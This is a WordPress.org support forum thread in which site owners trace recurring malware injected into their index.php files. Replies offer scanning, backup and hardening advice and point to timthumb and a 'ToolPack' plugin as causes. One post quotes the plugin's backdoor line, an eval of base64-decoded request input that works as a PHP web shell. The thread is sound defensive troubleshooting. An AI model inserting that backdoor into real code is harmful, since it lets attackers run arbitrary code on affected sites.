WordPress.org

Ready to get started?Download WordPress

Forums

malware attack (10 posts)

  1. webtechdev
    Member
    Posted 2 years ago #

    Below Malware script attacked my sites . i removed it more that 15 times but it is coming again and again . Changing the ftp passwords in 2 hour once but no use . help me to remove this script and stop its routine attack .

    [Code moderated. Don't post hack code here.]

  2. rgat
    Member
    Posted 2 years ago #

    Me Too! Ours looks the same man! Help us! >_<

    [Code moderated. Don't post hack code here.]

  3. rgat
    Member
    Posted 2 years ago #

    Nothing seems to be infected while checking for rootkits, is this new?

    Used chkrootkit-0.49

  4. webtechdev
    Member
    Posted 2 years ago #

    @rgat basically my each and every index.php file na matter which directory it is locatd code auto past in to top of index file .
    i set the permission to recommended 755 dir 644file not it stop pasting the code but stiil em worried about what is happening !! anyone help us.

  5. MickeyRoush
    Member
    Posted 2 years ago #

    There may be no easy solution. I've combined as many links into one post so that you won't have to search the entire web indefinitely. Hopefully they will help you.

    Check your site(s) here:
    1. http://sitecheck.sucuri.net/scanner/
    2. http://www.unmaskparasites.com/
    3. http://www.virustotal.com/
    4. http://www.phishtank.com/
    5. http://www.browserdefender.com/
    6. http://ismyblogworking.com/
    7. Google Safe Browsing (to access a site's google info, add their domain to the end of this):
    http://www.google.com/safebrowsing/diagnostic?site=
    example:
    http://www.google.com/safebrowsing/diagnostic?site=example.com

    Backup everything and put that backup somewhere safe.This is in case you have problems later on. Even though you could be backing up infected files, it is more important to have a backup up of your work, for if you make a mistake cleaning your site, you will still have the backup(s).
    1. http://codex.wordpress.org/WordPress_Backups
    2. http://codex.wordpress.org/Backing_Up_Your_Database
    3. http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Then read these:
    1. http://codex.wordpress.org/FAQ_My_site_was_hacked
    2. http://wordpress.org/support/topic/268083#post-1065779
    3. http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    4. http://ottopress.com/2009/hacked-wordpress-backdoors/

    If you have indications of possible timthumb hacking, please read these:
    1. http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html
    2. http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
    3. http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/
    4. http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

    Once your site is clean, then read this:
    1. http://codex.wordpress.org/Hardening_WordPress
    2. http://codex.wordpress.org/htaccess_for_subdirectories

  6. webtechdev
    Member
    Posted 2 years ago #

    @MickeyRoush
    i checked most of the links.
    but now i installed a fresh copy for test what is happening.
    after uploading what i have seen is hacking code is there on top of the site.

    don't no what is happening.

  7. gal_op
    Member
    Posted 2 years ago #

    I have the same issue, all my index.php are keep on being injected with the malicious code.

    I found an old plugin folder that i have uninstalled in the past, the folder is empty except to a file called ToolPack.php and it had a line of code:
    $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;

    I have removed the folder and now i am waiting to see if the malicious code is back.

    I have found out that this is could be the backdoor:
    http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html

    Will update you soon

  8. rgat
    Member
    Posted 2 years ago #

    Thanks a lot for all the replies, I'll try doing the suggestions you replied here.

    Kindest Regards,

    rgat

  9. rgat
    Member
    Posted 2 years ago #

    Hi All,

    Just reporting that it was timthumb/blackhole exploit and I do not know anymore how to fix it. In the end my boss hired a security expert to fix this.

    But it looks like they are also having difficulties. Do you think re-installing everything to a different server will fix this?

    Best Regards,

    Randy A.

  10. webtechdev
    Member
    Posted 2 years ago #

    @rgat

    thanks for updating more regarding topic.
    secondly i heard about tool pack plugin which is one line plugin
    and causing some other people site as well and they mentioned this.
    After removing this plugin everything is working perfectly and i upgrade 7 blogs as well which are out-dated.

    simple tips

    upgrade blog + plugins
    apply recommend file permission
    -install file monitoring plugin to keep eye on file and
    -install firewall plugin

    thanks

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags